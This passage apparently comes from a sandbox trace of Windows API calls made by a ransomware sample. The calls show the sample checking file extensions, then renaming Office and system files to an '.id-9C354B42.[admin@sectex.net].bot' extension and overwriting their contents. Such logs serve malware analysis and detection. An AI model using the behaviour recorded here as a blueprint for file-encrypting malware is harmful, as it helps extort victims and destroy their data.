	[0054.804] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1
	[0054.804] lstrlenW (lpString=".bz2") returned 4
	[0054.804] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1
	[0054.804] lstrlenW (lpString=".7z") returned 3
	[0054.804] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1
	[0054.804] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui") returned 72
	[0054.804] lstrlenW (lpString=".dbf") returned 4
	[0054.804] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1
	[0054.804] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui") returned 72
	[0054.804] lstrlenW (lpString=".1cd") returned 4
	[0054.804] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1
	[0054.804] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui") returned 72
	[0054.804] lstrlenW (lpString=".jpg") returned 4
	[0054.804] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1
	[0054.804] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui") returned 72
	[0054.804] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui") returned 72
	[0054.804] lstrlenW (lpString=".doc") returned 4
	[0054.804] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1
	[0054.804] lstrlenW (lpString=".docx") returned 5
	[0054.804] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1
	[0054.804] lstrlenW (lpString=".pdf") returned 4
	[0054.804] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1
	[0054.804] lstrlenW (lpString=".xls") returned 4
	[0054.804] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1
	[0054.804] lstrlenW (lpString=".xlsx") returned 5
	[0054.804] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1
	[0054.804] lstrlenW (lpString=".ppt") returned 4
	[0054.805] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1
	[0054.805] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui") returned 72
	[0054.805] lstrlenW (lpString=".zip") returned 4
	[0054.805] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1
	[0054.805] lstrlenW (lpString=".rar") returned 4
	[0054.805] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1
	[0054.805] lstrlenW (lpString=".bz2") returned 4
	[0054.805] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1
	[0054.805] lstrlenW (lpString=".7z") returned 3
	[0054.805] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1
	[0054.805] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui") returned 72
	[0054.805] lstrlenW (lpString=".dbf") returned 4
	[0054.805] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1
	[0054.805] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui") returned 72
	[0054.805] lstrlenW (lpString=".1cd") returned 4
	[0054.805] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1
	[0054.805] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui") returned 72
	[0054.805] lstrlenW (lpString=".jpg") returned 4
	[0054.805] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1
	[0054.805] lstrcmpiW (lpString1=".mui", lpString2=".bot") returned 1
	[0054.805] lstrlenW (lpString="tipresx.dll.mui") returned 15
	[0054.805] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\da-dk\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8
	[0054.806] GetFileSizeEx (in: hFile=0x1a8, lpFileSize=0xa2dff1c | out: lpFileSize=0xa2dff1c*=3584) returned 1
	[0054.806] CloseHandle (hObject=0x1a8) returned 1
	[0054.806] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\da-dk\\tipresx.dll.mui")) returned 0x20
	[0054.806] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\da-dk\\tipresx.dll.mui.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0054.806] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\da-dk\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0054.806] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui") returned 72
	[0054.806] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui") returned 72
	[0054.806] lstrlenW (lpString=".doc") returned 4
	[0054.806] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1
	[0054.806] lstrlenW (lpString=".docx") returned 5
	[0054.806] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1
	[0054.806] lstrlenW (lpString=".pdf") returned 4
	[0054.806] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1
	[0054.806] lstrlenW (lpString=".xls") returned 4
	[0054.806] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1
	[0054.806] lstrlenW (lpString=".xlsx") returned 5
	[0054.806] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1
	[0054.806] lstrlenW (lpString=".ppt") returned 4
	[0054.806] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1
	[0054.806] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui") returned 72
	[0054.806] lstrlenW (lpString=".zip") returned 4
	[0054.806] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1
	[0054.806] lstrlenW (lpString=".rar") returned 4
	[0054.806] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1
	[0054.806] lstrlenW (lpString=".bz2") returned 4
	[0054.806] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1
	[0054.806] lstrlenW (lpString=".7z") returned 3
	[0054.807] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1
	[0054.807] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui") returned 72
	[0054.807] lstrlenW (lpString=".dbf") returned 4
	[0054.807] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1
	[0054.807] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui") returned 72
	[0054.807] lstrlenW (lpString=".1cd") returned 4
	[0054.807] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1
	[0054.807] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui") returned 72
	[0054.807] lstrlenW (lpString=".jpg") returned 4
	[0054.807] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1
	[0054.807] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui") returned 72
	[0054.807] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui") returned 72
	[0054.807] lstrlenW (lpString=".doc") returned 4
	[0054.807] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1
	[0054.807] lstrlenW (lpString=".docx") returned 5
	[0054.807] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1
	[0054.807] lstrlenW (lpString=".pdf") returned 4
	[0054.807] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1
	[0054.807] lstrlenW (lpString=".xls") returned 4
	[0054.807] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1
	[0054.807] lstrlenW (lpString=".xlsx") returned 5
	[0054.807] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1
	[0054.807] lstrlenW (lpString=".ppt") returned 4
	[0054.807] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1
	[0054.807] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui") returned 72
	[0054.807] lstrlenW (lpString=".zip") returned 4
	[0054.807] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1
	[0054.807] lstrlenW (lpString=".rar") returned 4
	[0054.807] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1
	[0054.807] lstrlenW (lpString=".bz2") returned 4
	[0054.807] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1
	[0054.807] lstrlenW (lpString=".7z") returned 3
	[0054.807] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1
	[0054.807] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui") returned 72
	[0054.807] lstrlenW (lpString=".dbf") returned 4
	[0054.808] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1
	[0054.808] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui") returned 72
	[0054.808] lstrlenW (lpString=".1cd") returned 4
	[0054.808] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1
	[0054.808] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui") returned 72
	[0054.808] lstrlenW (lpString=".jpg") returned 4
	[0054.808] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1
	[0054.808] lstrcmpiW (lpString1=".mui", lpString2=".bot") returned 1
	[0054.808] lstrlenW (lpString="tipresx.dll.mui") returned 15
	[0054.808] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\de-de\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x234
	[0055.002] GetFileSizeEx (in: hFile=0x234, lpFileSize=0xa2dff1c | out: lpFileSize=0xa2dff1c*=4096) returned 1
	[0055.002] CloseHandle (hObject=0x234) returned 1
	[0055.002] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\de-de\\tipresx.dll.mui")) returned 0x20
	[0055.002] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\tipresx.dll.mui.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\de-de\\tipresx.dll.mui.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0055.002] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\de-de\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0055.002] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\tipresx.dll.mui") returned 72
	[0055.002] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\tipresx.dll.mui") returned 72
	[0055.002] lstrlenW (lpString=".doc") returned 4
	[0055.002] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1
	[0055.002] lstrlenW (lpString=".docx") returned 5
	[0055.002] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1
	[0055.002] lstrlenW (lpString=".pdf") returned 4
	[0055.002] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1
	[0055.002] lstrlenW (lpString=".xls") returned 4
	[0055.002] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1
	[0055.002] lstrlenW (lpString=".xlsx") returned 5
	[0055.003] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1
	[0055.004] lstrlenW (lpString=".ppt") returned 4
	[0055.004] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1
	[0055.004] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\tipresx.dll.mui") returned 72
	[0055.004] lstrlenW (lpString=".zip") returned 4
	[0055.004] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1
	[0055.004] lstrlenW (lpString=".rar") returned 4
	[0055.004] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1
	[0055.004] lstrlenW (lpString=".bz2") returned 4
	[0055.004] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1
	[0055.004] lstrlenW (lpString=".7z") returned 3
	[0055.004] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1
	[0055.004] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\tipresx.dll.mui") returned 72
	[0055.004] lstrlenW (lpString=".dbf") returned 4
	[0055.004] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1
	[0055.422] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\InkObj.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\inkobj.dll"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\InkObj.dll.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\inkobj.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0
	[0055.426] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\micaut.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\micaut.dll"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\micaut.dll.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\micaut.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0
	[0055.427] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\mraut.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\mraut.dll"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\mraut.dll.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\mraut.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0
	[0056.051] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\msointl.dll"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\msointl.dll.id-9c354b42.[admin@sectex.net].bot")) returned 1
	[0056.052] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\msointl.dll.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1cc
	[0056.052] SetFilePointerEx (in: hFile=0x1cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2dfc6c | out: lpNewFilePointer=0x0) returned 1
	[0056.052] SetFilePointerEx (in: hFile=0x1cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2dfc2c | out: lpNewFilePointer=0x0) returned 1
	[0056.052] ReadFile (in: hFile=0x1cc, lpBuffer=0xae90058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa2dfc38, lpOverlapped=0x0 | out: lpBuffer=0xae90058*, lpNumberOfBytesRead=0xa2dfc38*=0x40000, lpOverlapped=0x0) returned 1
	[0056.123] SetFilePointerEx (in: hFile=0x1cc, liDistanceToMove=0xcdbd5, lpNewFilePointer=0x0, dwMoveMethod=0xa2dfc2c | out: lpNewFilePointer=0x0) returned 1
	[0056.123] ReadFile (in: hFile=0x1cc, lpBuffer=0xaed0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa2dfc38, lpOverlapped=0x0 | out: lpBuffer=0xaed0058*, lpNumberOfBytesRead=0xa2dfc38*=0x40000, lpOverlapped=0x0) returned 1
	[0056.139] SetFilePointerEx (in: hFile=0x1cc, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0xa2dfc6c | out: lpNewFilePointer=0xffffffff) returned 1
	[0056.139] SetFilePointerEx (in: hFile=0x1cc, liDistanceToMove=0x229380, lpNewFilePointer=0x0, dwMoveMethod=0xa2dfc2c | out: lpNewFilePointer=0x0) returned 1
	[0056.139] ReadFile (in: hFile=0x1cc, lpBuffer=0xaf10058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa2dfc38, lpOverlapped=0x0 | out: lpBuffer=0xaf10058*, lpNumberOfBytesRead=0xa2dfc38*=0x40000, lpOverlapped=0x0) returned 1
	[0056.159] SetFilePointerEx (in: hFile=0x1cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2dfec8 | out: lpNewFilePointer=0x0) returned 1
	[0056.159] WriteFile (in: hFile=0x1cc, lpBuffer=0xae90020*, nNumberOfBytesToWrite=0xc0102, lpNumberOfBytesWritten=0xa2dfcb0, lpOverlapped=0x0 | out: lpBuffer=0xae90020*, lpNumberOfBytesWritten=0xa2dfcb0*=0xc0102, lpOverlapped=0x0) returned 1
	[0056.722] SetEndOfFile (hFile=0x1cc) returned 1
	[0056.913] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x40000) returned 0xbb10048
	[0056.917] SetFilePointerEx (in: hFile=0x1cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2dfc7c | out: lpNewFilePointer=0x0) returned 1
	[0056.917] WriteFile (in: hFile=0x1cc, lpBuffer=0xbb10048*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa2dfc88, lpOverlapped=0x0 | out: lpBuffer=0xbb10048*, lpNumberOfBytesWritten=0xa2dfc88*=0x40000, lpOverlapped=0x0) returned 1
	[0056.919] SetFilePointerEx (in: hFile=0x1cc, liDistanceToMove=0xcdbd5, lpNewFilePointer=0x0, dwMoveMethod=0xa2dfc7c | out: lpNewFilePointer=0x0) returned 1
	[0056.919] WriteFile (in: hFile=0x1cc, lpBuffer=0xbb10048*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa2dfc88, lpOverlapped=0x0 | out: lpBuffer=0xbb10048*, lpNumberOfBytesWritten=0xa2dfc88*=0x40000, lpOverlapped=0x0) returned 1
	[0056.924] SetFilePointerEx (in: hFile=0x1cc, liDistanceToMove=0x229380, lpNewFilePointer=0x0, dwMoveMethod=0xa2dfc7c | out: lpNewFilePointer=0x0) returned 1
	[0056.924] WriteFile (in: hFile=0x1cc, lpBuffer=0xbb10048*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa2dfc88, lpOverlapped=0x0 | out: lpBuffer=0xbb10048*, lpNumberOfBytesWritten=0xa2dfc88*=0x40000, lpOverlapped=0x0) returned 1
	[0056.927] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0xbb10048 | out: hHeap=0x7d60000) returned 1
	[0056.927] CloseHandle (hObject=0x1cc) returned 1
	[0057.794] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0057.893] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL") returned 72
	[0057.893] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL") returned 72
	[0057.893] lstrlenW (lpString=".doc") returned 4
	[0057.893] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0057.893] lstrlenW (lpString=".docx") returned 5
	[0057.893] lstrcmpiW (lpString1=".docx", lpString2="L.DLL") returned -1
	[0057.893] lstrlenW (lpString=".pdf") returned 4
	[0057.893] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0057.893] lstrlenW (lpString=".xls") returned 4
	[0057.893] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0057.893] lstrlenW (lpString=".xlsx") returned 5
	[0057.893] lstrcmpiW (lpString1=".xlsx", lpString2="L.DLL") returned -1
	[0057.893] lstrlenW (lpString=".ppt") returned 4
	[0057.893] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0057.893] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL") returned 72
	[0057.893] lstrlenW (lpString=".zip") returned 4
	[0057.893] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0057.893] lstrlenW (lpString=".rar") returned 4
	[0057.893] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0057.893] lstrlenW (lpString=".bz2") returned 4
	[0057.893] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0057.893] lstrlenW (lpString=".7z") returned 3
	[0057.893] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0057.893] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL") returned 72
	[0057.893] lstrlenW (lpString=".dbf") returned 4
	[0057.893] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0057.893] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL") returned 72
	[0057.893] lstrlenW (lpString=".1cd") returned 4
	[0057.893] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0057.894] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL") returned 72
	[0057.894] lstrlenW (lpString=".jpg") returned 4
	[0057.894] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0057.894] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL") returned 72
	[0057.894] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL") returned 72
	[0057.894] lstrlenW (lpString=".doc") returned 4
	[0057.894] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0057.894] lstrlenW (lpString=".docx") returned 5
	[0057.894] lstrcmpiW (lpString1=".docx", lpString2="L.DLL") returned -1
	[0057.894] lstrlenW (lpString=".pdf") returned 4
	[0057.894] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0057.894] lstrlenW (lpString=".xls") returned 4
	[0057.894] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0057.894] lstrlenW (lpString=".xlsx") returned 5
	[0057.894] lstrcmpiW (lpString1=".xlsx", lpString2="L.DLL") returned -1
	[0057.894] lstrlenW (lpString=".ppt") returned 4
	[0057.894] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0057.894] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL") returned 72
	[0057.894] lstrlenW (lpString=".zip") returned 4
	[0057.894] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0057.894] lstrlenW (lpString=".rar") returned 4
	[0057.894] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0057.894] lstrlenW (lpString=".bz2") returned 4
	[0057.894] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0057.894] lstrlenW (lpString=".7z") returned 3
	[0057.894] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0057.894] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL") returned 72
	[0057.894] lstrlenW (lpString=".dbf") returned 4
	[0057.894] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0057.894] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL") returned 72
	[0057.894] lstrlenW (lpString=".1cd") returned 4
	[0057.894] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0057.894] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL") returned 72
	[0057.894] lstrlenW (lpString=".jpg") returned 4
	[0057.894] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0057.895] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0057.895] lstrlenW (lpString="ACEDAO.DLL") returned 10
	[0057.895] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEDAO.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acedao.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x234
	[0058.269] GetFileSizeEx (in: hFile=0x234, lpFileSize=0xa2dff1c | out: lpFileSize=0xa2dff1c*=744888) returned 1
	[0058.269] CloseHandle (hObject=0x234) returned 1
	[0058.269] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEDAO.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acedao.dll")) returned 0x20
	[0058.269] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEDAO.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acedao.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0058.269] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEDAO.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acedao.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x234
	[0058.269] SetFilePointerEx (in: hFile=0x234, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2dfec8 | out: lpNewFilePointer=0x0) returned 1
	[0058.269] SetFilePointerEx (in: hFile=0x234, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2dfec8 | out: lpNewFilePointer=0x0) returned 1
	[0058.269] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEDAO.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acedao.dll.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188
	[0058.270] GetLastError () returned 0x0
	[0058.270] ReadFile (in: hFile=0x234, lpBuffer=0xae90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2dfed4, lpOverlapped=0x0 | out: lpBuffer=0xae90020*, lpNumberOfBytesRead=0xa2dfed4*=0xb5db8, lpOverlapped=0x0) returned 1
	[0058.286] WriteFile (in: hFile=0x188, lpBuffer=0xae90020*, nNumberOfBytesToWrite=0xb5dc0, lpNumberOfBytesWritten=0xa2dfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae90020*, lpNumberOfBytesWritten=0xa2dfc9c*=0xb5dc0, lpOverlapped=0x0) returned 1
